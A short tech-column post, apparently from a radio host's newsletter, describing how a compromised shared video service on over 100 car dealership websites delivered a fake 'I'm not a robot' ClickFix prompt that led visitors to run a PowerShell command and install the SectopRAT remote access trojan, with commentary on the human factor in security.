The ClickFix attack tactic seems to be gaining traction among threat actors. Over 100 auto dealerships were being abused in a supply chain attack from a compromised shared video service that is unique to dealerships. When active, the attack presented dealership website visitors with a ClickFix attack which led to a SectopRAT malware infection.

When the user visited any of the over 100 dealerships websites, there was a chance that a specific JavaScript would load, containing malicious code. If it did, it redirected the user to a page on a compromised host that prompted the user with the increasingly familiar reCAPTCHA process of “I’m not a robot”:

Clicking the “I’m not a robot” checkbox actually gave the JavaScript the privilege to copy a malicious execution string onto the user’s computer system’s clipboard. The malicious Javascript then also extended the “I’m not a robot” dialog with a drop-down menu containing additional verification steps for the user to perform:

The visitor was instructed to surreptitiously activate the Windows RUN command dialog by pressing the keyboard’s Windows key then ‘R’. Doing that would give the RUN field the system’s focus. The next instruction was to press CTRL+V which would copy the malicious command that the JavaScript had pre-loaded onto the system’s clipboard into the Run command field – all of this happening without the end user knowing anything was going on in the background.

The final CAPTHA step was that the user was instructed to press Enter.

When the user performed these steps, a Powershell script was executed on the user’s machine that downloaded further malware payloads and ultimately installed the remote access malware trojan SectopRAT. This new attack is diabolically clever and I believe it identifies a fundamental problem that doesn’t have a simple solution – and that’s the human factor.

The important point is that tech-savvy PC users are still in the minority. The vast majority of PC users are trained to just “Follow Instructions” which has always been their way of life within the PC world.

Even though this particular attack was limited to automotive dealerships, we can expect these types of challenges will become more sophisticated and used against us in many different ways.

Read more here:
https://www.darkreading.com/cyberattacks-data-breaches/compromised-car-dealership-websites-clickfix-breach

Deliver David's Tech Talk to my inbox

We'll send David's weekly Tech Talk to your inbox - including the MP3 of the actual radio spot. You'll never miss a valuable tip again!